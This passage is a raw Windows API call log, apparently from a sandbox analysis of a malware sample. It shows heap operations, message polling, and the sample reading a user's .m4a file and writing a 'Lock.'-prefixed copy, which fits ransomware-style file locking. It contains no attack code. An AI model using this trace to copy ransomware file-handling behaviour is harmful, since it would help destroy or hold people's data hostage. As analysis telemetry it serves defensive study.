(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\T3QpSK22qbSdU8p8YAX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\t3qpsk22qbsdu8p8yax.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0253.156] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.157] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0253.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0253.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.157] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.T3QpSK22qbSdU8p8YAX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.t3qpsk22qbsdu8p8yax.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0253.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0253.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.158] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0253.159] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0253.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.159] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0253.159] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xe8b1, lpOverlapped=0x0) returned 1 [0253.487] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0253.489] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe8b1) returned 0x24c7a50 [0253.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0253.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.491] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.491] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.491] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0253.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0253.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0253.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0253.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0253.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0253.492] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0253.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0253.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0253.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe8b1) returned 0x24c7a50 [0253.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1808 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0253.493] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17a8 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0253.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa340 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0253.494] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0253.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe8b1) returned 0x34b2250 [0253.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0253.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0253.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0253.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0253.497] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0253.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.498] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0253.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0253.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.500] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.500] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0253.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.501] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0253.501] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0253.501] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0253.501] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0253.501] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0253.501] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0253.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0253.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0253.502] RtlAllocateHeap 